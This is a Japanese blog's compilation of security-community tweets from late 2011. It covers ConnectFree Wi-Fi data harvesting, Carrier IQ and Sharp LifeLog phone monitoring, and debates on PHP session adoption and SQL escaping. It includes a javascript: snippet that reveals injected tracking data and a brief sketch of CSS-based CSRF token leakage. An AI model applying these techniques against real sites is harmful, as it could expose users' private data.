ぼくも限定公開している写真があるのですがどうしたものかと考えてしまいます。
expl01t :Facebook に公開範囲を限定してうpした写真が見られてしまう話.ここがまとまってるかな.Updateも多いですし.Reading: Facebook flaw allows access to private photos


メールアドレスが凶悪ですw
ockeghem :【拡散希望】#wasbook / “徳丸本をブロガーに差し上げちゃうキャンペーンのお知らせ - ockeghem(徳丸浩)の日記” http://htn.to/gc1Dom


海外サイトで最近よく見かける、ツールを直接ダウンロードさせてくれず、自社製の怪しいツールをまずインストールさせてそれ経由でダウンロードさせるやり方についてのお話。
itmedia :[エンタープライズ]ダウンロードサイトがセキュリティツールにマルウェアをバンドル? 開発者が苦言 http://bit.ly/rMvrHC


その他に気になったことはこのあたり。
piyokango :重要インフラにおける分野横断的演習 ~【CIIREX 2011(シーレックス2011) 】~の実施について(PDF)

piyokango :『特に、今年度のシナリオには、サプライチェーンの混乱、サービス障害に伴う風評・デマや標的型攻撃への対応を取り入れています。』


ockeghem :【速報】Opera11.60にて、属性型ドメインのCookie Monster Bugは修正された模様


ntsuji :先日、しゃべらせていただいたセミナーの動画配信が始まっていますよ。よろしければみなさんご覧くださいませ。 / サイバー攻撃はなぜ防げなかったのか?セキュリティ脅威の最新動向と対策セミナー http://bit.ly/sdVtAo


WisecWisec :RT @shreeraj: Double eval() for DOM based XSS - http://j.mp/rX38wm - helpful during pen-testing ...


rryu2010 :既知になってから6年も放置していても悪用事例が1件も無いのは、大した脆弱性じゃないという証拠なのではないかと。 / “PHPのセッションアダプション脆弱性克服への道のり” http://htn.to/C3mhrn

テーマ : セキュリティ
ジャンル : コンピュータ

12月5日のtwitterセキュリティクラスタ

このAndroidビックウェーブに早く乗り込まないと!と思っていたのですが、つい魔が差してカメラを買ってしまったので乗り遅れそうです。

オサレなスマホとして名を馳せているINFOBARですが、知らない誰かによって生暖かく見守られていることが判明したようです。
maglev6785 :IS05ちゃんにmixiログ、Twitterログ、通話記録、ワンセグ視聴時間、写真のデータ、アドレス帳データなどが全て傍受されるLifeLogが搭載されてることが判明\(^o^)/

Atsunov :シャープ製スマホ(全部かは知らん)のLifeLogServiceの件、とりあえず停止する方法はないわけじゃない。ただし、一時的にroot権限取得できるツール必須。メーカーに言わせれば非正規な手段だろうが、そんな手段取らないと止められないこと自体「異常」だと思うけどねおれは。

shino_katsuragi :auに限らないようだが。 / “au INFOBAR A01にユーザの行動を監視するCarrier IQの日本版「LifeLogService」が見つかり問題に” http://htn.to/LJK86k


togetterでまとめられているので、詳細についてはこちらを。
togetter_jp :.@soh_alternative さんの「auのシャープ製Androidスマホ「INFOBAR」での「LifeLog..」が2000PV達成!こりゃすごいやー!わたしもがんばる! http://togetter.com/li/222346


動作の詳細についてはこちら。
Atsunov :「jp.co.sharp.android.lifelog.database.LifelogServiceは何をしているのか?」をトゥギャりました。 http://togetter.com/li/223506


昨日話題だったconnectFreeも引き続き。近所でサービスしているところがあれば行ってみたいものですが。
umisama :ConnectFreeの問題について書きました。 #connectfree / smatcha- フリー無線LAN「ConnectFree」は個人情報収集機か? http://smarter-jp.net/newsetc/31802/

umisama :#connectfree で接続中にアドレスバーに「javascript:alert(cfbar_clientdata["sns"]["twitter"]["id"])」って入力するだけで背筋ゾクッとさせることができてオススメです。 夏にやりたいね。

bulkneets :無料WiFiは危険→いやいや電気通信事業者は盗聴すると犯罪になっちゃうからやらない、あとソフトバンクはパケット代かかりまくりよりWiFiのほうが安いからタダにしてる、でも偽アクセスポイント作られると危険→最近WPA対応したらしいけど→意味あんの? という調査が死体


そしてアメリカでブームのCarrier IQはようやく全貌が見えてきたり対策が打たれたりしていますね。
tahiro_1986jpn :Carrier iQ 対策アプリ - インターネットコム

tokinarazu :[そのAndroid携帯(iPhoneも?)、あなたの操作を無断で全部記録してますよ、Carrier IQで(動画)] http://goo.gl/D59hD

ockeghem :『事実は何なのかをもう一度整理する必要があると思っていたが、セキュリティ研究者のダン・ローゼンバーグ氏がまとめていた』 / “yebo blog: Carrier IQの本当の話” http://htn.to/KuVJ5x


怪しいツールはどんどんマルウェア認定されていけばいいのですよ。
data_head :Android端末からWi-Fiを経由してPC/デバイスの脆弱性を探し出すツールがPUP認定とな。


聞き慣れないセッションアダプション脆弱性について。書いてあることだけだとちょっとよくわからないのでPoCを試してみたいですね。
ockeghem :『セッションアダプションが致命的な脆弱性であることは少しブラウザのクッキーで実験してみれば分かる』<実験した htn.to/wJznf4 / “PHPのセッションアダプション脆弱性克服への道のり” http://htn.to/qLkUgc

ockeghem :2009/5/15の日記(再) / “PHPのSession Adoptionは重大な脅威ではない - ockeghem(徳丸浩)の日記” http://htn.to/wJznf4

bulkneets :@ockeghem 昨日あたり読んだのですが、有効なセッション食わせてユーザーがそのまま自分のセッションと勘違いして機密情報入力、が抜けてないですか? cookie monster bugそのものなので新たな脅威ではないですけど

ockeghem :@bulkneets それはあり得ますが、対象サイトで有効なsession idを得てから攻撃できるので、session fixationの変形で、session adoptionは必要ありません


Andoroidで熱くなってる一方Javaの脆弱性を狙った攻撃がたくさん来ているようです。自分のPCにはJavaVMを入れないようにしていますが、知らずに入っている人は多そうです。
security_1topi :実際に攻撃に利用されていることが報告されています。Javaのバージョンは見落としがちな傾向があるようなので今すぐチェックを。 / Java SE を対象とした既知の脆弱性を狙う攻撃に関する注意喚起 - http://r.sm3.jp/3m4P #1tp

security_1topi :インストールされているJavaのバージョン確認はコチラで簡単にできます。 / Java のバージョンの確認 - http://r.sm3.jp/3m4S #1tp


そしてSQLインジェクションも。管理者の皆様は注意しておきたいものですね。
piyokango :『東京SOCでは2011年12月1日、データベースに Microsoft SQL Server を利用する、ASPで構築されたWebサイトに以下のような不正な文字列を挿入しようとするSQLインジェクション攻撃を確認しました。』 /SQ… http://htn.to/SQrRbt

テーマ : セキュリティ
ジャンル : コンピュータ

12月3~4日のtwitterセキュリティクラスタ

Connectfreeという公衆無線LANサービスが、TwitterIDとFacebookをMACアドレスに紐付け記録したり、Amazonのリンクにアフィリエイトを埋め込んだりしていた模様。
cetacea :connectfree 、twitterにアクセスしたらユーザーID収集してるっぽいんだけどきのせい?

cetacea :しかも amazon アクセスしたらアフィ勝手に仕込んでるぞ…

cetacea :ひどいっていうレベルじゃねーぞ…

cetacea :閲覧ページに無理矢理scriptを押し込めるので、ページ内グローバル変数はどこからでも参照可能というのを使ってえげつないことしてる

cetacea :Facebook、twitterは端末・APのMACアドレスと紐付けた上、ユーザーIDを読み取って送信。amazonはアフィリエイトID仕込んでる。 RT @HiromitsuTakagi (略)そのSRC属性に が指定されている。

HiromitsuTakagi :エー?どこ見ればいいですかー?(終電まであと20分) RT @cetacea Facebook、twitterは端末・APのMACアドレスと紐付けた上、ユーザーIDを読み取って送信。…

cetacea :@HiromitsuTakagi 挿入されるというam6.jpからのスクリプトです。twitter のtwttrオブジェクト、facebookのEnvオブジェクトから読み出した後、ajaxで に送信してます

HiromitsuTakagi :しかし、TwitterやFacebookのIDと紐付けて、どう利用するつもりなんだ。コネクトフリーの奴ら、絶対、個人的に見てニヤニヤしてるだろ。

bulkneets :@HiromitsuTakagi この仕組だとページ側に罠を仕掛けておけば訪問者の端末のMACアドレスを抜けるのでは

HiromitsuTakagi :コネクトフリーで私の日記に来た人は、MACアドレスを私に見られる(ように私が仕掛けを仕込むことができる)という意味ですね。 RT @bulkneets ページ側に罠を仕掛けておけば訪問者の端末のMACアドレスを抜けるのでは

HiromitsuTakagi :その通りです。amazon以外を含む全てで。RT @hamanako コネクトフリーを使ってインターネットに接続している間にAmazonで買い物をすると、コネクトフリーの人にtwitterとFacebookのアカウントと買い物の内容と、それを行った場所や時間まで全部送信されると…

Hotspring_r :@HiromitsuTakagi @bulkneets 実装してみた。明日にでも調べようと思っていたのですが、今可能であれば試してみていただけないでしょうか。 こちらにアクセスしてGetMacAddressをクリックで表示されるはずです。


このあとクリストファーから高木先生に生電話ということもあったのですが、全体的なことが知りたい方はまとめを読まれるといいでしょう。
Hamham_Fenrir :公衆無線LANのConnectFree、利用するとTwitter IDとFacebookをMACアドレスと紐づけられ、いつどこでどのサイトを閲覧したか収集されるらしい http://togetter.com/li/223293


SAIKYO_NEWS :公衆無線LANのConnectFree、利用するとAmazonアフィなどが勝手に組み込まれることが発覚 - ニュース速報 2ch http://goo.gl/WV5We


@yohgaki、@ockeghem両氏(後に@rryu2010氏も加わって)によるセッションアダプション問題が危険なのかという問題からphpでDBを扱うときの安全な処理についての議論が興味深かったのでまとめてみました。@yohgaki氏は指針、@ockeghem氏は現実的な話と、語っているレイヤーが微妙にずれているのでイマイチかみ合いません。どちらも間違ってないのでしょうけど。@yohgakiさんがどのように実装されるのか記事で読んでみたいですね。
yohgaki :PHPのセッションアダプション問題は深刻な問題ではない、っていう話はどこから来てるんだ?明確に危険なのだけど。知ってる人は教えてください。

ockeghem :何人もが書いていますが ではないですか?明確な危険性があれば教えて下さい RT @yohgaki: PHPのセッションアダプション問題は深刻な問題ではない、っていう話はどこから来てるんだ?明確に危険なのだけど。知ってる人は教えてください

yohgaki :@ockeghem 情報ありがとうございます。後で見てみます。ところで実装論でいうならDBが正しく処理するのが当然でしょう。もしくは古いDB2のようにエラーにするかでしょうね。

ockeghem :@yohgaki 実装論でいうならそうでしょうが、使う側はそれをあてにしてはいけない、ということだと思います。

yohgaki :@ockeghem DB本来の目的はデータを確実かつ安全に保存することです。そこが担当するのが自然でしょう。受け入れるけど、結果は保証しない、というのはDBとしては問題ありです。

ockeghem :@yohgaki いえ、ちゃんとMySQLの動作はマニュアル通りです。ISOにも違反していません

yohgaki :@ockeghem 困るからマニュアルには書いてあるでしょうね。DBの開発者としてこれを放置するのはどうかなと思いますよ。そもそも論でいうと。それからこう言ったケースに対応する為にも3つの方針が必要でIPAの文書は1つ欠けているから徳丸さん主張と矛盾した状況になっています。

ockeghem :@yohgaki 1つとは、何が欠けていますか?

yohgaki :@ockeghem 個人的にはescapeの説明も足りないと思いますが、quoteメソッドを使えば良い、という書き方になってますよね?quoteメソッドを実装するにはバリデーションが必須では?なかった様に思いますがあります?

ockeghem :@yohgaki バリデーションはいらないと思います。あくまでパラメータの場合は、ということですが。

yohgaki :@ockeghem 数値の場合はquoteメソッドでも'で囲んでエスケープしないのですよね?数値だとどうやって保証するのでしょう。

ockeghem :@yohgaki quoteの数値の動作検証については、こちらを参照下さい

yohgaki :@ockeghem URLありがとうございます。実装にばらつきがでるのはある程度仕方ないので、データを安全に保存すべきDBが保存できないのが悪い!と言って直させるのが一番手っ取り早いと思います。'数値'と数値で保存されるデータが違う、なんて状態で私が開発者ならさっさと直しますね

rryu2010 :@yohgaki データを正確に保存したいというのであれば手段は静的プレースホルダしかありません。浮動小数点数を10進文字列にした時点で誤差が出ますし、uncode文字列も正規化方式が維持されるのか謎ですから、たとえリテラルであっても正確性にはある程度の妥協があります。

yohgaki :@rryu2010 データベースでUnicodeの正規化は行うべきではないでしょう。そのまま保存すべきです。なのでおかしな文字列はクエリエラーにしてしまえば良いだけです。言語とDBでは表現可能な範囲が異なるので、変換しないでそのまま送る、が基本であるべきだと思います。

yohgaki :@ockeghem 徳丸さんの方法論に合わないアプリや環境はどうするのでしょうか?私の場合は指針なので変わった環境でも適切に処理する余地が残してあります。

yohgaki :@rryu2010 もちろん明示でなくて、暗黙で正規化するDBの事です。明示するのはアリですから。

yohgaki :もう1つ指摘させていただきます。SQL DBは元々テキストデータ(SQL文のデータ)を保存するシステムとして作られました。なのでこの部分は本質的に間違ってますよ RT @rryu2010 SQLにデータを埋め込んで送るというのは本質的に良く無いやり方

yohgaki :SQLはJavaや.NETのように縛られてる環境の人はプリペアードクエリだけ使ってればよい(ただし注意事項はあるけど)もっと自由な環境の場合は自由である反面リスクもあるので理解して正しく使えば良い、という単純な話だと思うのだけどなあ。

yohgaki :全般的なセキュリティ対策の指針を作る場合、幅広い環境・システムに対応するためには基本中の基本から対策&理解してないと何処かでおかしな事になるか行き詰まる。

yohgaki :もちろん環境・システムが限定されている場合はそれに特化したセキュリティ対策の指針を作ることが望ましい。ここがセキュリティ対策のスペシャリストの仕事だと思う。

ockeghem :@yohgaki phpMyAdminのようなものを作る場合は例外でしょうね。そういうものを開発する人は上級者であるはず(べき)ですから独自に考えてもらいましょう。私が想定しているのは一般的なWebアプリケーションです。

yohgaki :@ockeghem ターゲットを良く解ってない方にするのは構わないというか、そういう割り切りも必要です。でも割り切りし過ぎてると思いますよ、IPAの文書。LLは自由度が高いのでそれに合わせるべきかと思います。

yohgaki :@ockeghem DBがどうあるべきか、は見解が違うので時間ができたらまたブログに考えを書いておきます。

ockeghem :@yohgaki 一般性を高めると、開発者が具体的にどうすればよいかが分からなくなります。「安全なSQLの呼び出し方」は、具体的にどうすべきかを書くことを目指しましたので、その分適用範囲は少し狭くなりますね

rryu2010 :@yohgaki 「言語とDBでは表現可能な範囲が異なるので」というのはまさにその通りで、なので私はSQL文とデータを別々に扱うべきだと思っています。静的プレースホルダは異なるものを別々に扱えるようにしたものですから、変換しないでそのまま送るのに適した方法です。

rryu2010 :@yohgaki 存在するかどうかは分かりませんが、SQLの仕様として文字列リテラルも含むSQL全体を正規化して評価してはいけないという決まりが無ければ、正規化されても文句は言えない気がします。

rryu2010 :@yohgaki 当初そうだったからといってそれが本質的に良いものとは限りません。SQL絡みの問題はほぼ間違いなく値を埋め込むという処理で起こっていて、かつバインド機構を持たないライブラリはまず無いという現状からすると、良くない方法だったと言わざるを得ないのではないでしょうか。



アメリカでは大問題っぽいCarrier IQについていろいろ。
kitagawa_takuji :【レポート】米国を騒がせる「Carrier IQ」問題、多くのスマホに行動監視ツールが潜在

gizmodojapan :【最新記事】 全米大震撼中! Carrier IQとは何か? http://dlvr.it/yczng #gizjp

kohisuki :めも RT @gohsuket: 各キャリアとメーカーのCarrierIQ関係状況 RT @privacyint Which companies are on the Carrier IQ bandwagon? -- Engadget - http://tinyurl.com/cefqydv

irfanramdhan :#TechCrunch Don’t Blame The IQ, Blame The Carrier http://bit.ly/rJQCj1

repre12 :自分のじゃリネーム予めしてあるのか、traffic monitorでもわからん androidは手間隙かかりすぎるあんどろいど速報 キャリアが仕込む個人情報収集アプリ『Carrier IQ』

soh_alternative :Carrier IQ問題 - 「ユーザーのキー入力記録や送信はない」と米セキュリティ専門家

Lope_lw :NiiのBlog: Android等にCarrier IQが実装されているとプライバシーがだだ漏れらしい  とりあえずEVO3Dを購入したわたし大勝利ということでよろしいか

kalab1998 :「Carrier IQ」問題。「iOS5では外された」とどこかで見て自分には関係ないと思ったら,第4世代ipod touch(iOS5)でもどっこい生きていて(自分がonにした?)無線LAN経由でログ送られていた.とりあえずoffに出来るみたいなのでoffに.脇が甘いorz...


その他に気になったことはこのあたり。
ikutana :やる夫で学ぶ暗号。 描いてる途中で放置してるけど、需要あるかなぁ。 http://pic.twitter.com/h9GTWIsg


ntsuji :ポッドキャスト、セキュリティの「アレ」- 第4回 うかうかしてたら冬が始まるよスペシャル 公開しました。移動時間などのお供にw http://bit.ly/ujMPyf#tsujileaks


expl01t :「情報化推進室の態勢を拡充する形で民間の専門家も加える」とのこと。来月にも設けるのかぁ。Reading: 参議院に情報セキュリティー部署 #fb


mt7080 :企業の通信の0.6%は「ウイルスの疑い」、ブルーコートが調査 - ニュース:ITpro http://nkbp.jp/tdcyH6#itprojp


07c00 :すべてのアンチマルウェアソフトで検知してくれる VirusTotal: http://virustotal.com #セキュリティさくら

テーマ : セキュリティ
ジャンル : コンピュータ

12月2日のtwitterセキュリティクラスタ

やってるかやってないか聞かれて答えられないというのは、普通に考えるとやってるからですよね。auはandroidマーケットではちゃんとセキュリティについて取り組んでいる気がしたのですが、そもそも端末に怪しいアプリが入ってるんじゃしょうがないですよね。
HiromitsuTakagi :auのシャープ製Androidスマホ「INFOBAR」でjp.co.sharp.android.lifelog.databaseパッケージの「LifeLogService」なるサービスが購入時から稼働していていることについて、KDDIに問い合わせた件、10月28日に回答があり、…
HiromitsuTakagi :…10月28日に回答があり、問い合わせのやり直しを要求し、質問事項「このLifeLogServiceは、何を取得するもので、何を記録するものか。」としたことは、twitter.com/HiromitsuTakag… に書いていた。その後、時間をかけて調べた上での再回答が、11月18日にあった。

HiromitsuTakagi :11月18日のKDDIの回答「KDDIとシャープ合わせての回答。LifeLogは、Android端末の各機能を正常に機能させるためのサービスである。それ以上の回答はない。」「アプリ自体が単体で何かをするというわけではなく、Android OSのサービスの機能のために入っている。」

HiromitsuTakagi :続き「ご質問としては、何を記録するものか確認して欲しいとのことだったが、このアプリ独自で何かをするというものではなく、KDDIとしては、機能を正常に動かすためのアプリのひとつであるという認識で販売してる。そのため取り扱い説明書にもとくに記載していない。」

HiromitsuTakagi :「何を記録するものか」という質問には答えないので、「その点には答えないということか」と問い質したが、延々はぐらかされて堂々巡りとなったため、上司から改めて回答するとの展開に。翌19日、上司からの回答があった。

HiromitsuTakagi :11月19日の回答 KDDI「Android OSに搭載されている各機能を正常に機能させるためのアプリの一つというのが現時点での最終的な回答」私「そういうことを聞いているのではなく、何か記録をとっているのかと聞いた」KDDI「それ以上の回答はできない」私「つまり、この…

HiromitsuTakagi :私「…つまり、このアプリが何か記録をとっているか否かということについて、回答できないということですね?」KDDI「回答できるかできないかということではなく、正常に機能させるためのアプリの一つであるとしか案内できない。」私「うん、だからそれは回答できないという意味でしょ?」

HiromitsuTakagi :(中略)私「そういった質問には答えないということですか?イエスまたはノーなんですが。」KDDI「お答えすることは現状回答を持っていない以上できないということです。」私「わかりました。」(中略)私「なぜこのような質問をするのかは、前回伝えたように、…

HiromitsuTakagi :…ように、例えば米国でもAppleのiPhoneが位置情報を全部記録していたことが明らかになって問題となった。同様のことが、LifeLogという名称からして、行われていないのか疑われるわけで、そうではないのなら、ないとの回答が欲しいんですが、やってるかやってないか答えることは…

HiromitsuTakagi :…答えることはできないと、こういう回答でしょ? いいんですか?それで。だって私たちが使っているスマートフォンじゃないですか。そこにどういう機能が最初から勝手に盛り込まれてるか、私たちは把握する権利があると思うんですよね。またそちらには説明する義務があると思うんですよね。そういう…

HiromitsuTakagi :…そういう観点で問い合わせて、何週間もかけて調べて頂いて、結論が最初と同じで、答えるの答えないのと聞いてもごにゃごにゃ言って、要は答えないと。いうことですよね?」KDDI「回答を持ち合わせていないというのが正確なところです。」私「調べてもいないっていうわけではないんでしょ?」

HiromitsuTakagi :KDDI「もちろんお時間頂いていますのでその間弊社としても調査した。」私「具体的な内容を聞いているわけではないんですよ、秘密に当たるようなことはあるでしょうから。記録を取ってたりしてませんか?という単純な質問ですから、しているとかしていないとか答えればいいのに、答えないと」

HiromitsuTakagi :…答えないということですね。」KDDI「申し訳ございません」私「よくわかりました。ありがとうございます。」 (おわり)


そして、auとAndroidがらみで。
rocaz :KDDIより回答がありましたので追記しました / auのPCサイトビューアーで脆弱性が発覚か? ? 続:auのEZWebがそろそろ終了しそうな件 | [ bROOM.LOG ! ] http://j.mp/w1aVVV


typex20 :HTCの端末には個人情報を収集するプログラムが仕込まれているとは。しかも脆弱性があってマルウェアに悪用される可能性があるとは。SHのLifeLogも同様にアウトかな。。 / “HTC、セキュリティ上の欠陥を認め、フィックスの更新を計画…” http://htn.to/zKsEts


1つの状況で正しいことをすべての状況に置き換えるのは危険だなあと、文章を書いたり問題を作ったりするときにいつも考えさせられます。
ockeghem :日記書いた。数値を文字列リテラルとして処理する件について / “何が正しいのかを考える際は、正しさの基準が必要 - ockeghem(徳丸浩)の日記” http://htn.to/8tR9wV

yasushia :なるほど。意味がわからんかったけどPHPのセキュリティホールじゃなくてDBのバグだ、と言っていたんだ。 http://j.mp/tUgjLV http://j.mp/tTIgoYセキュリティを論じるときに無造作に「正しい」とか言う人は信用できないです


当事者としては信用問題で笑ってられないことなのですが、爆笑してしまいました。
piyokango :『「gredセキュリティレポートVol.28」におきまして、正規のサイトをフィッシングサイトの例として誤って掲載してしまいました。』/gredセキュリティレポートVol.28に掲載したフィッシングサイトの誤掲載について http://bit.ly/u27jM2


その他に気になったことはこのあたり。
piyokango :久々のぞうさん。 / “Zousanと学ぼう 最低限の情報セキュリティ対策(第8回) - IPA情報セキュリティブログ - 楽天ブログ(Blog)” http://htn.to/TzTKv1


kitagawa_takuji :与党の秘書が選管ホームページを攻撃 ソウル市長選で不正画策 10月のソウル市長選の投開票日に同国中央選管のホームページをサイバー攻撃し、一時ダウンさせたとして、与党ハンナラ党の崔球植国会議員の秘書(27)ら4人を拘束したと明らかにした。


itm_security :Adobe Flex SDKに脆弱性、FlexアプリにXSS問題発生の恐れ: Flex SDKの脆弱性が原因となって、Flexアプリケーションにクロスサイトスクリプティング(XSS)問題が発生する恐れがある。 http://bit.ly/sqrLz0


kitagawa_takuji :Javaの脆弱性狙う攻撃が横行、全ソフトウェアのアップデート適用を - ITmedia エンタープライズ  2011年6月までの1年間で見ると、各四半期の間に発生した攻撃のうち、約3分の1から2分の1をJavaに対する攻撃が占め、


kitagawa_takuji :12/2 読売新聞 朝刊10面では "「悪」を教えよう” とのタイトルで海外での国をあげてのハッカー養成の取り組み、かたや日本ではセプキャンが来年度は予算が削減されそうだとの記事

テーマ : セキュリティ
ジャンル : コンピュータ

12月1日のtwitterセキュリティクラスタ

複数人で1つの管理者権限を利用するときには、使った状況をノートに書くのがオススメという記事についてのお話。前提が正しくないという気もしますが、まあ。
ntsuji :まさかの! 「管理者権限を利用するときには、それぞれの担当者が「いつごろ、何のために使ったか」を1冊の大学ノートに書き記すようにしておく。それだけで不正を見つけやすくなる。」 / 出口対策していますか? - http://nkbp.jp/uDfZhi

migimatsu :ぇぇぇぇぇ... しかも大学ノート ^^;RT @ntsuji: まさかの! 「管理者権限を利用するときには、それぞれの担当者が「いつごろ、何のために使ったか」を1冊の大学ノートに書き記すようにしておく。それだけで不正を見つけやすくなる」 nkbp.jp/uDfZhi

roaring_dog :@migimatsu @ntsuji えー。この21世紀に大学ノート。しかもロールを分配するのではなくていきなり管理者権限!!

bugbird :@ntsuji なんらかの形でチェックをすることは正論だが、方法が酷過ぎるw 火打石でガスレンジを着火させるような話だ < http://nkbp.jp/u1dSCZ

ntsuji :@bugbird トレース可能な状態にしておくことは必要だと思うのですが、あまりにもレガシーというか漏れが多そうというか信頼度が低い方法というか。。。

F0ro :@roaring_dog @migimatsu @ntsuji ロール分配の話はともかく「誰がいつなんのためになにをやったか」をノートに記録するのはありかなと思ってます。筆跡鑑定とか改ざん検出がデジタルよりも容易(というか前例がたくさんある)なのでForensicsでは使ってます

roaring_dog :@F0ro @migimatsu @ntsuji 紙の利点もありますね。昔の職場でセキュリティレベルが異なる境界の入退出記録に大学ノートを使っていました。

migimatsu :@roaring_dog @F0ro @ntsuji ロール配分すらしていない管理組織が、ログとノートの突き合わせ監査やるとは思えませんw IDS アラームは黙って消しまくり、ファイアウォールログですら誰も監査しないっつーのにw

ntsuji :@F0ro @roaring_dog @migimatsu フォレンジックの現場ではノートを使うと聞いたことあります。観点を変えるとアリな場合もありますね。記事の場合や入退室だとノートだけではなくカメラなどを併用するのがベターかなと思います。書き忘れなどもありえるかと思うので。

bugbird :@ntsuji セキュリティドアの監視カメラで、非常用 IC カードを持ち出したままだったスタッフを特定した実績あります。プライバシの問題はありますが監視カメラはかなり有効ですね

F0ro :@ntsuji @roaring_dog @migimatsu もちろん証明力を高める手段として複数の客観的な証拠もあわせて提出して突合するのはアリで、実際に画像や動画も証拠として用いられます。ただ現実問題としてどこまでやるか、という相場観がちょっと日本ではまだない気がします。

ntsuji :@bugbird どのロケーションかどれくらい重要かというところとお金の兼ね合いになるんだと思うのですが入退室カードだけだと心許なく思ってしまうシーンですね。


詳細はまだ不明ですが、激しく気になりますね。次報を待ちたいところです。
s_hskz :Oh! @0x6D6172696F tweets.. Google Chrome bug. I can read CSRF tokens with CSS only. Very few requests, ~500 for 32 chars

s_hskz :問題は、input要素のhiddenコントロールに格納されているトークンがどのタイプなのかという点? session-id or CSRF token か? まー、難しすぎて私にはぜんぜんわからない。 教えてプリーズ。

s_hskz :HTTPレスポンスの【ボディ部】を仕掛けのあるスタイルシートで取り出すということ? input要素のhiddenコントロールに格納されている値もダダ漏れということなのかな?

hasegawayosuke :SafariとChromeはCSSだけでCSRFトークン読めるという話、PoC見てみたいですね。

bulkneets :@hasegawayosuke @s_hskz これと同等?外部から取れるとは言ってないんじゃ http://eaea.sirdarckcat.net/cssar/

bulkneets :CSS自由に適用できるサービスだと、attributeに応じて別の背景画像リクエスト飛ばすようなCSSに切り替えまくってattributeに何が適用されてるのか調べられる、みたいな問題っぽいな


こちらも気になる噂が。
gohsuket :@sen_u そいえば今日小耳に挟んだ噂で、来年度セプキャンが事業仕分けで落ち、でも何とか開催したい経産省が企業数10社に1口50万で協賛を求めて回ってる、てゆーのがあるんですが何かそちらにも耳に入ってますかね? 少数企業からだけ大口で出して貰うと波風立つので数あたってるとか。

sen_u :@gohsuket 特に聞いてませんねー。毎年何かしらの噂がありますけどね。w


今日までインターネットウィーク2011でしたね。
kjmkjm :IW2011のDNSねたは「古いBINDは捨てるべきだ」の一言に集約されるのかな。 #iw2011


スパイウェアがプリインストールされてるってたまらんですな。
typex20 :これがOMA-DM製品ベンダーのCarrier IQのスパイウェア疑惑記事の大元か。Androidは本当に終わってしまうのかもしれない。。 / “rootkitかサービス向上用ツールか――携帯端末のプリインストールソフトめぐり開発者が…” http://htn.to/FUcKbh


その他に気になったことはこのあたり。
kitagawa_takuji :ハッカー集団が国連機関のパスワードなど暴露、次は銀行を標的に - ITmedia エンタープライズ


ockeghem :説得力ありますね~>『何をもって妥当とするかは仕様が定めるものであり、従って仕様がなければ妥当性を論じることはできません』 / “妥当性とは仕様の所作 - SQLインジェクション対策とバリデーション - *「ふっかつのじゅもんがちがい…” http://htn.to/3RCgVC


MasafumiNegishi :イリノイ州の水道設備への攻撃の真相。笑える。休暇中の技術者が旅行先のロシアからアクセスしたのを勘違い。 Exclusive: Comedy of Errors Led to False ‘Water-Pump Hack’ Report http://bit.ly/rPMPz4


ymzkei5 :昨日、他社の同じようなプレスリリースを見たのはきっと気のせいです!>■ラック、被害の発覚が相次ぐ「標的型サイバー攻撃・対策支援サービス」を拡充 | LAC 


hasegawayosuke :OWASP Tokyo 再始動!!!!!!!! 超期待!!!!! http://twitter.com/#!/OwaspTokyo


MasafumiNegishi :IIJのセキュリティ情報統括室スタッフによるブログ Security Diary が本日公開されましたー。みなさん、ご贔屓に?。 http://sect.iij.ad.jp/index.html


MasafumiNegishi :今年 3月のRSAへの標的型攻撃に関する詳細な解説記事。 Into the Darkness: Dissecting Targeted Attacks http://bit.ly/uusjN1

テーマ : セキュリティ
ジャンル : コンピュータ

11月30日のtwitterセキュリティクラスタ

雨ですね。12月なだけに雪に変わったりでもするのでしょうか。

大垣氏の「なぜPHPアプリにセキュリティホールが多いのか?」という原稿にたくさん意見が集まって盛り上がっています。編集者としてはばんばんざいですよね。
yohgaki :はてなブックマーク - 第44回 セキュリティ対策が確実に実施されない2つの理由|gihyo.jp … 技術評論社 http://ow.ly/7I06Cモノリシックに書いているかどうかは処理が重複しているかどうかとは無関係


rryu2010 :大垣さんはそろそろ出力時のバリデーションに通らなかった場合にどう処理すべきなのかを明示するべき。「SQLに安全に使用できない文字が使われました」という例外でも出すのだろうか。 / “第44回 セキュリティ対策が確実に実施されない2つの…” http://htn.to/agXg8u


rryu2010 :大垣さんはそろそろ出力時のバリデーションに通らなかった場合にどう処理すべきなのかを明示するべき。「SQLに安全に使用できない文字が使われました」という例外でも出すのだろうか。 / “第44回 セキュリティ対策が確実に実施されない2つの…” http://htn.to/agXg8u


katzchang :バリデーションは仕様の話であって、セキュリティ対策ではない。出力の項も結局「バリデーションしなさい」ということになってて、何が言いたいのかようわからん。 / “第44回 セキュリティ対策が確実に実施されない2つの理由|gihyo.jp…” http://htn.to/31K4Jj


meltedice :Rails についてよく知らないのにdisってる検討はずれな残念記事。"なぜPHPアプリにセキュリティホールが多いのか?:第44回 セキュリティ対策が確実に実施されない2つの理由 #gihyojp "


pmakino :入力時のバリデーションと出力時のエスケープが重複処理だというような基本的な思い違いをするような人が解説文を書いているからですねわかります / “第44回 セキュリティ対策が確実に実施されない2つの理由|gihyo.jp … 技術評論社” http://htn.to/f9kg2a


ホワイトリストでのバリデーションは間違ってないけど、セキュリティとは特に関係ないし、実運用上は例外をどんどん追加する必要があって残念ということなのでしょうかね。
bakera :[メモ] 苦笑しつつスルーしたいところですが、Railsがdisられている部分はちょっと……。Rubyコミュニティの方々は力強く反応したほうが良いのではないかという気がしないでもないです。

sakuro :@bakera このコンテキストでARのバリデーションが出てくる辺りで読む気が失せてました…

bakera :@sakuro ですね……。徳丸さんが過去に何度も指摘されていたと思いますが、バリデーションはセキュリティのための施策ではないですからね……。

bakera :だいたい、入力を受け入れた直後にバリデーションが走ったら、値をアプリ側で訂正してから格納するという処理ができなくなりますよね。入力が少しでも変だったらエラーを出すしかない残念アプリになると思います。ひょっとしてPHPのフレームワークってそんな感じなんですか?

ockeghem :@bakera それ、WAFでホワイトリスト検査した場合の動作ですね。WAFのホワイトリスト検査がいけてないという根拠の1つです>入力が少しでも変だったらエラーを出すしかない残念アプリ

bakera :@ockeghem なるほど、WAFのホワイトリストにはそんな副作用もあるのですね。

ockeghem :@bakera そうなんです。この1点だけで、WAFのホワイトリストが使い物にならない理由として十分だと思います。


そりゃ怒り狂う人も出てくるわけですわ。
smbd :カミンスキーアタック、未対策がIPアドレスベースで10%はあるのかー


その他気になったことはこのあたり。
jpcert :JPCERT/CCセキュアコーディングチームによるCodezine執筆スタート。Androidアプリ開発者なら押さえておきたいJavaセキュアコーディングの意味と効果 ^YK


sophosjpmktg :米研究者がHPプリンタの脆弱性を実証――乗っ取られ、制御される恐れも - ITmedia エンタープライズ


